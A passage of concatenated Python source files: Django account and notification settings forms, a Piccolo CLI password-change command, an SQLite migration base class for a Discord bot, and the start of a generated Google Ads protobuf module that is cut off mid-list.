o.id for o in org_queryset if o.id not in disabled_orgs
]
def save(self):
enabled_orgs = set((o.id for o in self.cleaned_data.get('organizations')))
all_orgs = set(self.fields['organizations'].queryset.values_list('id', flat=True))
UserOption.objects.set_value(
user=self.user,
key='reports:disabled-organizations',
value=list(all_orgs.difference(enabled_orgs)),
)
class NotificationDeploySettingsForm(forms.Form):
CHOICES = [
(UserOptionValue.all_deploys, _('All deploys')),
(UserOptionValue.committed_deploys_only,
_('Deploys with your commits')), (UserOptionValue.no_deploys, _('Never'))
]
notifications = forms.ChoiceField(
choices=CHOICES,
required=False,
widget=forms.RadioSelect(),
)
def __init__(self, user, organization, *args, **kwargs):
self.user = user
self.organization = organization
super(NotificationDeploySettingsForm, self).__init__(*args, **kwargs)
self.fields['notifications'].label = "" # hide the label
deploy_setting = UserOption.objects.get_value(
user=user,
organization=self.organization,
key='deploy-emails',
default=UserOptionValue.committed_deploys_only,
)
self.fields['notifications'].initial = deploy_setting
def save(self):
value = self.data.get('{}-notifications'.format(self.prefix), None)
if value is not None:
UserOption.objects.set_value(
user=self.user,
organization=self.organization,
key='deploy-emails',
value=value,
)
class NotificationSettingsForm(forms.Form):
alert_email = forms.EmailField(
label=_('Email'),
help_text=_('Designate an alternative email address to send email notifications to.'),
required=False
)
subscribe_by_default = forms.BooleanField(
label=_('Automatically subscribe to alerts for new projects'),
help_text=_(
"When enabled, you'll automatically subscribe to alerts when you create or join a project."
),
required=False,
)
workflow_notifications = forms.ChoiceField(
label=_('Preferred workflow subscription level for new projects'),
choices=[
(UserOptionValue.all_conversations, "Receive workflow updates for all issues."),
(UserOptionValue.participating_only,
"Receive workflow updates only for issues that I am participating in or have subscribed to."),
(UserOptionValue.no_conversations, "Never receive workflow updates."),
],
help_text=_("This will be automatically set as your subscription preference when you create or join a project. It has no effect on existing projects."),
required=False,
)
self_notifications = forms.BooleanField(
label=_('Receive notifications about my own activity'),
help_text=_(
'Enable this if you wish to receive emails for your own actions, as well as others.'
),
required=False,
)
self_assign_issue = forms.BooleanField(
label=_('Claim unassigned issues when resolving them'),
help_text=_(
"When enabled, you'll automatically be assigned to unassigned issues when marking them as resolved."
),
required=False,
)
def __init__(self, user, *args, **kwargs):
self.user = user
super(NotificationSettingsForm, self).__init__(*args, **kwargs)
self.fields['alert_email'].initial = UserOption.objects.get_value(
user=self.user,
key='alert_email',
default=user.email,
)
self.fields['subscribe_by_default'].initial = (
UserOption.objects.get_value(
user=self.user,
key='subscribe_by_default',
default='1',
) == '1'
)
self.fields['workflow_notifications'].initial = UserOption.objects.get_value(
user=self.user,
key='workflow:notifications',
default=UserOptionValue.all_conversations,
project=None,
)
self.fields['self_notifications'].initial = UserOption.objects.get_value(
user=self.user, key='self_notifications', default='0'
) == '1'
self.fields['self_assign_issue'].initial = UserOption.objects.get_value(
user=self.user, key='self_assign_issue', default='0'
) == '1'
def get_title(self):
return "General"
def save(self):
UserOption.objects.set_value(
user=self.user,
key='alert_email',
value=self.cleaned_data['alert_email'],
)
UserOption.objects.set_value(
user=self.user,
key='subscribe_by_default',
value='1' if self.cleaned_data['subscribe_by_default'] else '0',
)
UserOption.objects.set_value(
user=self.user,
key='self_notifications',
value='1' if self.cleaned_data['self_notifications'] else '0',
)
UserOption.objects.set_value(
user=self.user,
key='self_assign_issue',
value='1' if self.cleaned_data['self_assign_issue'] else '0',
)
workflow_notifications_value = self.cleaned_data.get('workflow_notifications')
if not workflow_notifications_value:
UserOption.objects.unset_value(
user=self.user,
key='workflow:notifications',
project=None,
)
else:
UserOption.objects.set_value(
user=self.user,
key='workflow:notifications',
value=workflow_notifications_value,
project=None,
)
class ProjectEmailOptionsForm(forms.Form):
alert = forms.BooleanField(required=False)
workflow = forms.ChoiceField(
choices=[
(UserOptionValue.no_conversations, 'Nothing'),
(UserOptionValue.participating_only, 'Participating'),
(UserOptionValue.all_conversations, 'Everything'),
],
)
email = forms.ChoiceField(label="", choices=(), required=False,
widget=forms.Select())
def __init__(self, project, user, *args, **kwargs):
self.project = project
self.user = user
super(ProjectEmailOptionsForm, self).__init__(*args, **kwargs)
has_alerts = project.is_user_subscribed_to_mail_alerts(user)
# This allows users who have entered an alert_email value or have specified an email
# for notifications to keep their settings
emails = [e.email for e in user.get_verified_emails()]
alert_email = UserOption.objects.get_value(self.user, 'alert_email')
specified_email = UserOption.objects.get_value(self.user, 'mail:email', project=project)
emails.extend([user.email, alert_email, specified_email])
choices = [(email, email) for email in sorted(set(emails)) if email]
self.fields['email'].choices = choices
self.fields['alert'].initial = has_alerts
self.fields['workflow'].initial = UserOption.objects.get_value(
user=self.user,
project=self.project,
key='workflow:notifications',
default=UserOption.objects.get_value(
user=self.user,
project=None,
key='workflow:notifications',
default=UserOptionValue.all_conversations,
),
)
self.fields['email'].initial = specified_email or alert_email or user.email
def save(self):
UserOption.objects.set_value(
user=self.user,
key='mail:alert',
value=int(self.cleaned_data['alert']),
project=self.project,
)
UserOption.objects.set_value(
user=self.user,
key='workflow:notifications',
value=self.cleaned_data['workflow'],
project=self.project,
)
if self.cleaned_data['email']:
UserOption.objects.set_value(
user=self.user,
key='mail:email',
value=self.cleaned_data['email'],
project=self.project,
)
else:
UserOption.objects.unset_value(self.user, self.project, 'mail:email')
class TwoFactorForm(forms.Form):
otp = forms.CharField(
label=_('Authenticator code'),
max_length=20,
widget=forms.TextInput(
attrs={
'placeholder': _('Code from authenticator'),
'autofocus': True,
}
),
)
class ConfirmPasswordForm(forms.Form):
password = forms.CharField(
label=_('Sentry account password'),
widget=forms.PasswordInput(),
help_text='You will need to enter your current Sentry account password to make changes.',
required=True,
)
def __init__(self, user, *args, **kwargs):
self.user = user
super(ConfirmPasswordForm, self).__init__(*args, **kwargs)
needs_password = user.has_usable_password()
if not needs_password:
del self.fields['password']
def clean_password(self):
value = self.cleaned_data.get('password')
if value and not self.user.check_password(value):
raise forms.ValidationError(_('The password you entered is not correct.'))
elif not value:
raise forms.ValidationError(
_('You must confirm your current password to make changes.')
)
return value
|
py | b4106333fc20177a5a393f9b33ff459646271790 | import sys
from piccolo.apps.user.commands.create import (
get_confirmed_password,
get_password,
get_username,
)
from piccolo.apps.user.tables import BaseUser
def change_password():
"""
Change a user's password.
"""
username = get_username()
password = get_password()
confirmed_password = get_confirmed_password()
if not password == confirmed_password:
sys.exit("Passwords don't match!")
BaseUser.update_password_sync(user=username, password=password)
print(f"Updated password for {username}")
print(
"If using session auth, we recommend invalidating this user's session."
)
|
py | b41064223d6e1833f70ba497bcecb8810ab6215a | # -*- coding: utf-8 -*-
"""
This software is licensed under the License (MIT) located at
https://github.com/ephreal/rollbot/Licence
Please see the license for any restrictions or rights granted to you by the
License.
"""
from abc import ABC
import sqlite3
from sqlite3 import OperationalError
class Migration(ABC):
def __init__(self, db="discord.db"):
self.version = None
self.connection = sqlite3.connect(db)
self.description = "This is the abstract base class"
self.breaks = "These changes break no functionality"
if self.get_schema_version() == self.version:
self.migrated = True
else:
self.migrated = False
def migrate(self):
"""
Applies a migration to the database
"""
pass
def revert(self):
"""
Reverts changes done by this migration
"""
pass
def requisites(self):
"""
This must return true for the migration to run.
"""
pass
def revert_requisites(self):
"""
This must return True for the database revert to run
"""
pass
def upgrade_table_version(self, table):
"""
Increments the version of the table specified
"""
cursor = self.connection.cursor()
try:
cursor.execute("select version from db_versions where db=?",
(table,))
version = cursor.fetchall()[0][0]
version += 1
cursor.execute("""update db_versions set version = ?
where db = ?""", (version, table,))
except IndexError:
version = 0
cursor.execute("""insert into db_versions (db,version) values
(?, 0)""", (table,))
def downgrade_table_version(self, table):
"""
Decrements the version of the table specified
"""
cursor = self.connection.cursor()
try:
cursor.execute("select version from db_versions where db=?",
(table, ))
version = cursor.fetchall()[0][0]
version -= 1
if version < 0:
# The table is slated for removal, remove the version from the
# db_versions table now
cursor.execute("delete from db_versions where db=?", (table, ))
else:
cursor.execute("""update db_versions set version = ?
where db=?""", (version, table, ))
except IndexError:
pass
def get_schema_version(self):
"""Returns the current schema version of the database"""
cursor = self.connection.cursor()
sql = """select version from db_versions where db='schema'"""
try:
cursor.execute(sql)
version = cursor.fetchall()[0][0]
except sqlite3.OperationalError:
version = -1
except IndexError:
version = -1
return version
def failed_migration_pending(self, tables):
if not self.get_schema_version() == self.version:
return
cursor = self.connection.cursor()
for table in tables:
try:
sql = f"select * from {table} where id=1"
cursor.execute(sql)
except OperationalError:
return True
return False
|
py | b4106592a6ee5d9ee8fdbf03348a0d9321637394 | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads_v2/proto/common/criteria.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.ads.google_ads.v2.proto.enums import age_range_type_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_age__range__type__pb2
from google.ads.google_ads.v2.proto.enums import app_payment_model_type_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_app__payment__model__type__pb2
from google.ads.google_ads.v2.proto.enums import content_label_type_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_content__label__type__pb2
from google.ads.google_ads.v2.proto.enums import day_of_week_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_day__of__week__pb2
from google.ads.google_ads.v2.proto.enums import device_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_device__pb2
from google.ads.google_ads.v2.proto.enums import gender_type_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_gender__type__pb2
from google.ads.google_ads.v2.proto.enums import hotel_date_selection_type_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_hotel__date__selection__type__pb2
from google.ads.google_ads.v2.proto.enums import income_range_type_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_income__range__type__pb2
from google.ads.google_ads.v2.proto.enums import interaction_type_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_interaction__type__pb2
from google.ads.google_ads.v2.proto.enums import keyword_match_type_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_keyword__match__type__pb2
from google.ads.google_ads.v2.proto.enums import listing_custom_attribute_index_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_listing__custom__attribute__index__pb2
from google.ads.google_ads.v2.proto.enums import listing_group_type_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_listing__group__type__pb2
from google.ads.google_ads.v2.proto.enums import location_group_radius_units_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_location__group__radius__units__pb2
from google.ads.google_ads.v2.proto.enums import minute_of_hour_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_minute__of__hour__pb2
from google.ads.google_ads.v2.proto.enums import parental_status_type_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_parental__status__type__pb2
from google.ads.google_ads.v2.proto.enums import preferred_content_type_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_preferred__content__type__pb2
from google.ads.google_ads.v2.proto.enums import product_bidding_category_level_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_product__bidding__category__level__pb2
from google.ads.google_ads.v2.proto.enums import product_channel_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_product__channel__pb2
from google.ads.google_ads.v2.proto.enums import product_channel_exclusivity_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_product__channel__exclusivity__pb2
from google.ads.google_ads.v2.proto.enums import product_condition_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_product__condition__pb2
from google.ads.google_ads.v2.proto.enums import product_type_level_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_product__type__level__pb2
from google.ads.google_ads.v2.proto.enums import proximity_radius_units_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_proximity__radius__units__pb2
from google.ads.google_ads.v2.proto.enums import webpage_condition_operand_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_webpage__condition__operand__pb2
from google.ads.google_ads.v2.proto.enums import webpage_condition_operator_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_webpage__condition__operator__pb2
from google.protobuf import wrappers_pb2 as google_dot_protobuf_dot_wrappers__pb2
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/ads/googleads_v2/proto/common/criteria.proto',
package='google.ads.googleads.v2.common',
syntax='proto3',
serialized_options=_b('\n\"com.google.ads.googleads.v2.commonB\rCriteriaProtoP\001ZDgoogle.golang.org/genproto/googleapis/ads/googleads/v2/common;common\242\002\003GAA\252\002\036Google.Ads.GoogleAds.V2.Common\312\002\036Google\\Ads\\GoogleAds\\V2\\Common\352\002\"Google::Ads::GoogleAds::V2::Common'),
serialized_pb=_b('\n3google/ads/googleads_v2/proto/common/criteria.proto\x12\x1egoogle.ads.googleads.v2.common\x1a\x38google/ads/googleads_v2/proto/enums/age_range_type.proto\x1a@google/ads/googleads_v2/proto/enums/app_payment_model_type.proto\x1a<google/ads/googleads_v2/proto/enums/content_label_type.proto\x1a\x35google/ads/googleads_v2/proto/enums/day_of_week.proto\x1a\x30google/ads/googleads_v2/proto/enums/device.proto\x1a\x35google/ads/googleads_v2/proto/enums/gender_type.proto\x1a\x43google/ads/googleads_v2/proto/enums/hotel_date_selection_type.proto\x1a;google/ads/googleads_v2/proto/enums/income_range_type.proto\x1a:google/ads/googleads_v2/proto/enums/interaction_type.proto\x1a<google/ads/googleads_v2/proto/enums/keyword_match_type.proto\x1aHgoogle/ads/googleads_v2/proto/enums/listing_custom_attribute_index.proto\x1a<google/ads/googleads_v2/proto/enums/listing_group_type.proto\x1a\x45google/ads/googleads_v2/proto/enums/location_group_radius_units.proto\x1a\x38google/ads/googleads_v2/proto/enums/minute_of_hour.proto\x1a>google/ads/googleads_v2/proto/enums/parental_status_type.proto\x1a@google/ads/googleads_v2/proto/enums/preferred_content_type.proto\x1aHgoogle/ads/googleads_v2/proto/enums/product_bidding_category_level.proto\x1a\x39google/ads/googleads_v2/proto/enums/product_channel.proto\x1a\x45google/ads/googleads_v2/proto/enums/product_channel_exclusivity.proto\x1a;google/ads/googleads_v2/proto/enums/product_condition.proto\x1a<google/ads/googleads_v2/proto/enums/product_type_level.proto\x1a@google/ads/googleads_v2/proto/enums/proximity_radius_units.proto\x1a\x43google/ads/googleads_v2/proto/enums/webpage_condition_operand.proto\x1a\x44google/ads/googleads_v2/proto/enums/webpage_condition_operator.proto\x1a\x1egoogle/protobuf/wrappers.proto\x1a\x1cgoogle/api/annotations.proto\"\x93\x01\n\x0bKeywordInfo\x12*\n\x04text\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12X\n\nmatch_type\x18\x02 \x01(\x0e\x32\x44.google.ads.googleads.v2.enums.KeywordMatchTypeEnum.KeywordMatchType\":\n\rPlacementInfo\x12)\n\x03url\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"[\n\x15MobileAppCategoryInfo\x12\x42\n\x1cmobile_app_category_constant\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"q\n\x15MobileApplicationInfo\x12,\n\x06\x61pp_id\x18\x02 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12*\n\x04name\x18\x03 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"I\n\x0cLocationInfo\x12\x39\n\x13geo_target_constant\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"L\n\nDeviceInfo\x12>\n\x04type\x18\x01 \x01(\x0e\x32\x30.google.ads.googleads.v2.enums.DeviceEnum.Device\"r\n\x14PreferredContentInfo\x12Z\n\x04type\x18\x02 \x01(\x0e\x32L.google.ads.googleads.v2.enums.PreferredContentTypeEnum.PreferredContentType\"\xf1\x01\n\x10ListingGroupInfo\x12R\n\x04type\x18\x01 \x01(\x0e\x32\x44.google.ads.googleads.v2.enums.ListingGroupTypeEnum.ListingGroupType\x12H\n\ncase_value\x18\x02 \x01(\x0b\x32\x34.google.ads.googleads.v2.common.ListingDimensionInfo\x12?\n\x19parent_ad_group_criterion\x18\x03 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"\\\n\x10ListingScopeInfo\x12H\n\ndimensions\x18\x02 \x03(\x0b\x32\x34.google.ads.googleads.v2.common.ListingDimensionInfo\"\x9b\t\n\x14ListingDimensionInfo\x12I\n\rlisting_brand\x18\x01 \x01(\x0b\x32\x30.google.ads.googleads.v2.common.ListingBrandInfoH\x00\x12?\n\x08hotel_id\x18\x02 \x01(\x0b\x32+.google.ads.googleads.v2.common.HotelIdInfoH\x00\x12\x45\n\x0bhotel_class\x18\x03 \x01(\x0b\x32..google.ads.googleads.v2.common.HotelClassInfoH\x00\x12V\n\x14hotel_country_region\x18\x04 \x01(\x0b\x32\x36.google.ads.googleads.v2.common.HotelCountryRegionInfoH\x00\x12\x45\n\x0bhotel_state\x18\x05 \x01(\x0b\x32..google.ads.googleads.v2.common.HotelStateInfoH\x00\x12\x43\n\nhotel_city\x18\x06 \x01(\x0b\x32-.google.ads.googleads.v2.common.HotelCityInfoH\x00\x12^\n\x18listing_custom_attribute\x18\x07 \x01(\x0b\x32:.google.ads.googleads.v2.common.ListingCustomAttributeInfoH\x00\x12^\n\x18product_bidding_category\x18\r \x01(\x0b\x32:.google.ads.googleads.v2.common.ProductBiddingCategoryInfoH\x00\x12M\n\x0fproduct_channel\x18\x08 \x01(\x0b\x32\x32.google.ads.googleads.v2.common.ProductChannelInfoH\x00\x12\x64\n\x1bproduct_channel_exclusivity\x18\t \x01(\x0b\x32=.google.ads.googleads.v2.common.ProductChannelExclusivityInfoH\x00\x12Q\n\x11product_condition\x18\n \x01(\x0b\x32\x34.google.ads.googleads.v2.common.ProductConditionInfoH\x00\x12L\n\x0fproduct_item_id\x18\x0b \x01(\x0b\x32\x31.google.ads.googleads.v2.common.ProductItemIdInfoH\x00\x12G\n\x0cproduct_type\x18\x0c \x01(\x0b\x32/.google.ads.googleads.v2.common.ProductTypeInfoH\x00\x12`\n\x19unknown_listing_dimension\x18\x0e \x01(\x0b\x32;.google.ads.googleads.v2.common.UnknownListingDimensionInfoH\x00\x42\x0b\n\tdimension\"?\n\x10ListingBrandInfo\x12+\n\x05value\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\":\n\x0bHotelIdInfo\x12+\n\x05value\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"<\n\x0eHotelClassInfo\x12*\n\x05value\x18\x01 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\"X\n\x16HotelCountryRegionInfo\x12>\n\x18\x63ountry_region_criterion\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"G\n\x0eHotelStateInfo\x12\x35\n\x0fstate_criterion\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"E\n\rHotelCityInfo\x12\x34\n\x0e\x63ity_criterion\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"\xb4\x01\n\x1aListingCustomAttributeInfo\x12+\n\x05value\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12i\n\x05index\x18\x02 \x01(\x0e\x32Z.google.ads.googleads.v2.enums.ListingCustomAttributeIndexEnum.ListingCustomAttributeIndex\"\xe4\x01\n\x1aProductBiddingCategoryInfo\x12\'\n\x02id\x18\x01 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x32\n\x0c\x63ountry_code\x18\x02 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12i\n\x05level\x18\x03 \x01(\x0e\x32Z.google.ads.googleads.v2.enums.ProductBiddingCategoryLevelEnum.ProductBiddingCategoryLevel\"g\n\x12ProductChannelInfo\x12Q\n\x07\x63hannel\x18\x01 \x01(\x0e\x32@.google.ads.googleads.v2.enums.ProductChannelEnum.ProductChannel\"\x94\x01\n\x1dProductChannelExclusivityInfo\x12s\n\x13\x63hannel_exclusivity\x18\x01 \x01(\x0e\x32V.google.ads.googleads.v2.enums.ProductChannelExclusivityEnum.ProductChannelExclusivity\"o\n\x14ProductConditionInfo\x12W\n\tcondition\x18\x01 \x01(\x0e\x32\x44.google.ads.googleads.v2.enums.ProductConditionEnum.ProductCondition\"@\n\x11ProductItemIdInfo\x12+\n\x05value\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"\x93\x01\n\x0fProductTypeInfo\x12+\n\x05value\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12S\n\x05level\x18\x02 \x01(\x0e\x32\x44.google.ads.googleads.v2.enums.ProductTypeLevelEnum.ProductTypeLevel\"\x1d\n\x1bUnknownListingDimensionInfo\"|\n\x1aHotelDateSelectionTypeInfo\x12^\n\x04type\x18\x01 \x01(\x0e\x32P.google.ads.googleads.v2.enums.HotelDateSelectionTypeEnum.HotelDateSelectionType\"}\n\x1dHotelAdvanceBookingWindowInfo\x12-\n\x08min_days\x18\x01 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12-\n\x08max_days\x18\x02 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\"y\n\x15HotelLengthOfStayInfo\x12/\n\nmin_nights\x18\x01 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12/\n\nmax_nights\x18\x02 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\"b\n\x13HotelCheckInDayInfo\x12K\n\x0b\x64\x61y_of_week\x18\x01 \x01(\x0e\x32\x36.google.ads.googleads.v2.enums.DayOfWeekEnum.DayOfWeek\"g\n\x13InteractionTypeInfo\x12P\n\x04type\x18\x01 \x01(\x0e\x32\x42.google.ads.googleads.v2.enums.InteractionTypeEnum.InteractionType\"\xe3\x02\n\x0e\x41\x64ScheduleInfo\x12R\n\x0cstart_minute\x18\x01 \x01(\x0e\x32<.google.ads.googleads.v2.enums.MinuteOfHourEnum.MinuteOfHour\x12P\n\nend_minute\x18\x02 \x01(\x0e\x32<.google.ads.googleads.v2.enums.MinuteOfHourEnum.MinuteOfHour\x12/\n\nstart_hour\x18\x03 \x01(\x0b\x32\x1b.google.protobuf.Int32Value\x12-\n\x08\x65nd_hour\x18\x04 \x01(\x0b\x32\x1b.google.protobuf.Int32Value\x12K\n\x0b\x64\x61y_of_week\x18\x05 \x01(\x0e\x32\x36.google.ads.googleads.v2.enums.DayOfWeekEnum.DayOfWeek\"Z\n\x0c\x41geRangeInfo\x12J\n\x04type\x18\x01 \x01(\x0e\x32<.google.ads.googleads.v2.enums.AgeRangeTypeEnum.AgeRangeType\"T\n\nGenderInfo\x12\x46\n\x04type\x18\x01 \x01(\x0e\x32\x38.google.ads.googleads.v2.enums.GenderTypeEnum.GenderType\"c\n\x0fIncomeRangeInfo\x12P\n\x04type\x18\x01 \x01(\x0e\x32\x42.google.ads.googleads.v2.enums.IncomeRangeTypeEnum.IncomeRangeType\"l\n\x12ParentalStatusInfo\x12V\n\x04type\x18\x01 \x01(\x0e\x32H.google.ads.googleads.v2.enums.ParentalStatusTypeEnum.ParentalStatusType\"B\n\x10YouTubeVideoInfo\x12.\n\x08video_id\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"F\n\x12YouTubeChannelInfo\x12\x30\n\nchannel_id\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"?\n\x0cUserListInfo\x12/\n\tuser_list\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"\xa0\x02\n\rProximityInfo\x12?\n\tgeo_point\x18\x01 \x01(\x0b\x32,.google.ads.googleads.v2.common.GeoPointInfo\x12,\n\x06radius\x18\x02 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12\x62\n\x0cradius_units\x18\x03 \x01(\x0e\x32L.google.ads.googleads.v2.enums.ProximityRadiusUnitsEnum.ProximityRadiusUnits\x12<\n\x07\x61\x64\x64ress\x18\x04 \x01(\x0b\x32+.google.ads.googleads.v2.common.AddressInfo\"\x8f\x01\n\x0cGeoPointInfo\x12?\n\x1alongitude_in_micro_degrees\x18\x01 \x01(\x0b\x32\x1b.google.protobuf.Int32Value\x12>\n\x19latitude_in_micro_degrees\x18\x02 \x01(\x0b\x32\x1b.google.protobuf.Int32Value\"\xfc\x02\n\x0b\x41\x64\x64ressInfo\x12\x31\n\x0bpostal_code\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12\x33\n\rprovince_code\x18\x02 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12\x32\n\x0c\x63ountry_code\x18\x03 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12\x33\n\rprovince_name\x18\x04 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12\x34\n\x0estreet_address\x18\x05 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12\x35\n\x0fstreet_address2\x18\x06 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12/\n\tcity_name\x18\x07 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"m\n\tTopicInfo\x12\x34\n\x0etopic_constant\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12*\n\x04path\x18\x02 \x03(\x0b\x32\x1c.google.protobuf.StringValue\"G\n\x0cLanguageInfo\x12\x37\n\x11language_constant\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"?\n\x0bIpBlockInfo\x12\x30\n\nip_address\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"f\n\x10\x43ontentLabelInfo\x12R\n\x04type\x18\x01 \x01(\x0e\x32\x44.google.ads.googleads.v2.enums.ContentLabelTypeEnum.ContentLabelType\"E\n\x0b\x43\x61rrierInfo\x12\x36\n\x10\x63\x61rrier_constant\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"P\n\x10UserInterestInfo\x12<\n\x16user_interest_category\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"\x8d\x01\n\x0bWebpageInfo\x12\x34\n\x0e\x63riterion_name\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12H\n\nconditions\x18\x02 \x03(\x0b\x32\x34.google.ads.googleads.v2.common.WebpageConditionInfo\"\x93\x02\n\x14WebpageConditionInfo\x12\x63\n\x07operand\x18\x01 \x01(\x0e\x32R.google.ads.googleads.v2.enums.WebpageConditionOperandEnum.WebpageConditionOperand\x12\x66\n\x08operator\x18\x02 \x01(\x0e\x32T.google.ads.googleads.v2.enums.WebpageConditionOperatorEnum.WebpageConditionOperator\x12.\n\x08\x61rgument\x18\x03 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"e\n\x1aOperatingSystemVersionInfo\x12G\n!operating_system_version_constant\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"o\n\x13\x41ppPaymentModelInfo\x12X\n\x04type\x18\x01 \x01(\x0e\x32J.google.ads.googleads.v2.enums.AppPaymentModelTypeEnum.AppPaymentModelType\"P\n\x10MobileDeviceInfo\x12<\n\x16mobile_device_constant\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"K\n\x12\x43ustomAffinityInfo\x12\x35\n\x0f\x63ustom_affinity\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"G\n\x10\x43ustomIntentInfo\x12\x33\n\rcustom_intent\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"\x94\x02\n\x11LocationGroupInfo\x12*\n\x04\x66\x65\x65\x64\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12:\n\x14geo_target_constants\x18\x02 \x03(\x0b\x32\x1c.google.protobuf.StringValue\x12+\n\x06radius\x18\x03 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12j\n\x0cradius_units\x18\x04 \x01(\x0e\x32T.google.ads.googleads.v2.enums.LocationGroupRadiusUnitsEnum.LocationGroupRadiusUnitsB\xe8\x01\n\"com.google.ads.googleads.v2.commonB\rCriteriaProtoP\x01ZDgoogle.golang.org/genproto/googleapis/ads/googleads/v2/common;common\xa2\x02\x03GAA\xaa\x02\x1eGoogle.Ads.GoogleAds.V2.Common\xca\x02\x1eGoogle\\Ads\\GoogleAds\\V2\\Common\xea\x02\"Google::Ads::GoogleAds::V2::Commonb\x06proto3')
,
dependencies=[google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_age__range__type__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_app__payment__model__type__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_content__label__type__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_day__of__week__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_device__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_gender__type__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_hotel__date__selection__type__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_income__range__type__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_interaction__type__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_keyword__match__type__pb2.DESCRIPTOR,google_dot_ads_